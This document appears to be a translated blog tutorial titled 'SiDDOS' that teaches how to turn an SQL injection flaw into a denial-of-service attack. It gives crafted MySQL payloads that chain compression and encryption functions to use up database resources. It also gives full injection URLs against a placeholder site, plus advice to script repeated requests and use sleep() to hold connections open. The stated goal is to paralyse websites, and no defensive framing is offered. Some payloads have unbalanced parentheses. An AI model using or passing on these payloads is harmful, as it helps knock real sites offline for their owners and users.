SiDDOS: a method for implementing DDOS attacks through SQL Injection

SiDDOS: a method for implementing DDOS attacks through SQL Injection

 
In this tutorial, we will discuss how to use SQL injection to launch DDOS attacks on a website.
In fact, there have been some research and tutorials on it, but for me, this is still a brand new concept. As a result, I collected as much knowledge as possible about SQL syntax and restrictions on the number of website and database connections, as well as some methods that can be used to consume server resources. After completing all this, I decided to write a tutorial as much as I could.
If you still don't know much about ddos, You can first read some related articles. This article will mainly discuss SQL injection and how we use it to implement DDOS attacks.
DDOS (Distributed DOS attack) is designed to overload the server or slow response. In other words, it is used up as much server resources as possible to prevent other users from accessing the website normally. The attack method mentioned in this article belongs to DDOS attacks at the Web application layer, because DDOS attacks can be divided into many types.
Body
Before that, I would like to introduce the ideas and principles of this method so that you can better understand this attack method. We know that if a website has the SQL injection vulnerability, we can let the website database execute our SQL statements and get the corresponding output (of course, in some cases, there is no echo ). Therefore, we have an idea: Construct a complex enough SQL statement for the database to execute, so as to consume Web Services and database resources, and exhaust server resources, we can even allow the database to reach its maximum number of connections, so that the database can no longer respond to connection requests from other legal users.
At present, the entire idea is clear. We can start to construct complex SQL statements.
SQL provides many functions for us, allowing us to construct complex enough statements to get the corresponding output results using an extremely complex method, such as join (), like (), compress () and encode () functions.
We will take the following steps to complete our attack:
1. Find a website with the injection vulnerability.
2. Construct Our SQL Injection statements
3. Launch SQL DDOS attacks on the target website
I have discussed how to find SQL Injection Vulnerabilities and construct SQL statements in detail in my previous articles. You can read this article. Let me assume that you have the relevant knowledge and continue our discussion.
Inject our DDOS query statement to the website
There are many ways to do this. What you need is your brain and a website for testing. Next, let's construct a fatal SQL statement.
I created a 500-row table. Each field contains 500 bytes of data, which actually represents the data volume of some forums and blog sites. If the database is larger, we can find more database operation defects and launch DDOS attacks on such websites to make it easier to succeed.
We will use the following payload to launch DDOS attacks. I spent several hours constructing these payloads:
Select tab1 from (select decode (encode (convert (compress (post) using latin1), concat (post, post), sha1 (concat (post, post, post) as tab1 from table_1);
Select tab1 from (select decode (encode (convert (compress (post) using latin1), des_encrypt (concat (post, post), 8 )), des_encrypt (sha1 (concat (post, post), 9) as tab1 from table_1);
Suppose this is the website we found with the SQL injection vulnerability, and the injection statement is as follows:
Http://exploitable-web.com/link.php? Id = 1' union select 1, 2, 4 --
We assume that 3rd fields can be displayed back and forth. We place our second payload in the third field.
Http://exploitable-web.com/link.php? Id = 1' union select 1, 2, (select tab1 from (select decode (encode (convert (compress (post) using latin1), des_encrypt (concat (post, post, post), 8), des_encrypt (sha1 (concat (post, post, post), 9) as tab1 from table_1), 4 --
Or
Http://exploitable-web.com/link.php? Id = 1' union select 1, 2, tab1, 4 from (select decode (encode (convert (compress (post) using latin1), des_encrypt (concat (post, post, post), 8), des_encrypt (sha1 (concat (post, post, post), 9) as tab1 from table_1) --
Then, we can write a script to continuously send this query statement to the website database. Using this method, we can paralyze the website through a common connection. Use this method for DDOS

During attacks, we do not need thousands of bots.
We can also use the sleep statement to maintain our connection with the website and achieve the same DDOS attack effect. In asp.net, a maximum of 100 connections are allowed in 30 seconds by default. We can use sleep () persistent connection between us and the website (multiple connections can be performed using scripts at the same time), so that the server cannot normally respond to requests from other users.